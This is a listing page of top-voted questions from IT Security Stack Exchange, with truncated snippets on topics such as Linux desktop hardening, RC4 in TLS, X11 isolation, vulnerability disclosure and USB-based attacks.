Highest Voted Questions - IT Security Stack Exchange

40

votes

6 answers

Secure Linux Desktop

I'm looking for hints about secure linux desktops. Securing servers is no problem. Most recent Software Updates, run only the services required etc. But what about desktops? I'm thinking about details like Noscript for Firefox. ASLR, PIE and similar…

asked May 27 '11 at 17:29

chris

401
1
5
3

40

votes

1 answer

CSS based attacks

I'm currently working on a plugin for a CMS which should allow content editors to write inline style tags. I'm looking for advice / links on how inline styles could be abused. Part of the reason for the plugin is to allow for a strict content…

asked Jun 21 '13 at 11:10

symcbean

18,625
1
41
75

40

votes

5 answers

Client-side encryption, but cloud service can still decrypt data in the event of a death? Is this possible?

I've been worried about this password manager, PasswordBox that seems to be gathering quite a bit of steam lately. They seem to have raised VC funding and are offering a free password management and storage tool. Their team does not seem to have…

asked Jun 12 '13 at 15:01

Mallory

401
4
5

40

votes

1 answer

Passive and active attacks via X11. Is Wayland any better?

In The Linux Security Circus: On GUI isolation - The Invisible Things Lab's blog, Joanna Rutkowska describes attacks from one X11 app on another and the general problem of the lack of GUI-level isolation, and how it essentially nullifies all the…

asked May 05 '11 at 16:23

nealmcb

20,783
6
72
117

40

votes

1 answer

TLS: RC4 or not RC4?

I was reading another interesting article by Matthew Green today, saying that if you're using RC4 as your primary ciphersuite in SSL/TLS, now would be a great time to stop As far as I'm aware RC4 has been up'd on the list of ciphersuites to…

asked Mar 12 '13 at 21:45

Yoav Aner

5,359
3
26
37

40

votes

5 answers

What's the difference between VPN over TCP vs UDP?

My VPN provider gives me the option between using UDP and TCP for connections. According to this site UDP is faster over short distances. I'm on the same continent as my server, is that considered short distance? Is there a test I can run to compare…

vpn

asked Jan 10 '13 at 04:50

David Drohang

463
1
4
5

40

votes

6 answers

Software vendor refuses to fix security vulnerability - what to do?

I work as a consultant for a large corporation that uses some software, in which I have found a security vulnerability. I notified both my client and the software vendor about a year ago. They referred the case to their account manager (!), who (in…

disclosure

asked Sep 06 '22 at 16:59

TravelingFox

433
3
7

40

votes

4 answers

How do open-source projects prevent disclosing a bug while fixing it?

I understand that many open-source projects request vulnerabilities not to be disclosed on their public bug tracker but rather by privately contacting the project's security team, to prevent disclosing the bug before a fix is available. That makes…

asked Nov 11 '20 at 09:12

Heinzi

3,088
2
23
27

40

votes

8 answers

What is the attack scenario against which encrypted files provide protection?

There are a couple of files / tools which provide file-level encryption. I guess PDF and ZIP are probably the most commonly known ones. I wonder what scenario they actually help with or if it just is a bad solution. For example, if I want to be sure…

file-encryption

asked May 10 '20 at 11:26

Martin Thoma

3,952
6
33
42

40

votes

8 answers

Are all USB-based attacks dependent on being able to inject keystrokes?

From what I've seen, USB-based attacks such as RubberDucky need to be able to open a terminal and then execute commands from there, usually to download and then install malware or to open a reverse shell. Is this how most, if not all USB-based…

asked Jan 23 '20 at 10:20

user942937

983
8
14

40

votes

6 answers

Schemes/ Mechanisms that could provide one time decryption?

I am quite familiar with most of the common undergrad/grad security foundations; but I couldn't find anything related to this scenario: A scheme/system where a piece of data can only be 'decrypted' AND read only once (potentially in a computer…

asked Dec 02 '19 at 13:41

DaveIdito

521
4
3

40

votes

5 answers

Why do some web servers still provide information on vendor and version in the HTTP response headers

I think in the security field it is a well-known fact that its not a good idea to let the web server vendor (e.g. Apache) and the version be visible to the outside as this can be used to launch targeted attacks against a specific server…

asked Oct 16 '19 at 19:08

dfsg76

549
4
7

40

votes

4 answers

What benefits are there to blocking most search engines?

While on a client's site using the corporate network, I see that only a few search engines are allowed. Google and Bing, possibly others; while my fav DuckDuckGo is blocked, and a few others that I've tried are also blocked. The search engines are…

asked Sep 27 '19 at 12:22

YetAnotherRandomUser

2,290
2
15
20

40

votes

2 answers

How do email clients "send later" without storing a password?

Email clients like Spark for macOS have a feature where a user can send an email later, at any given time, even when the computer is turned off. An SMTP server needs a password based authentication, though. Does that mean that if I use Spark to send…

asked Sep 10 '19 at 03:27

NikxDa

783
1
5
12

40

votes

6 answers

Should 2FA be enabled on service accounts?

See the title. I'm involved in a security audit right now, and am wondering whether 2FA should be enabled on not just human login accounts but also on service accounts (non-human accounts)? If so, how is this normally managed? Someone must still be…

multi-factor

asked Jul 31 '19 at 18:52

Jason

509
1
4
3

Most Popular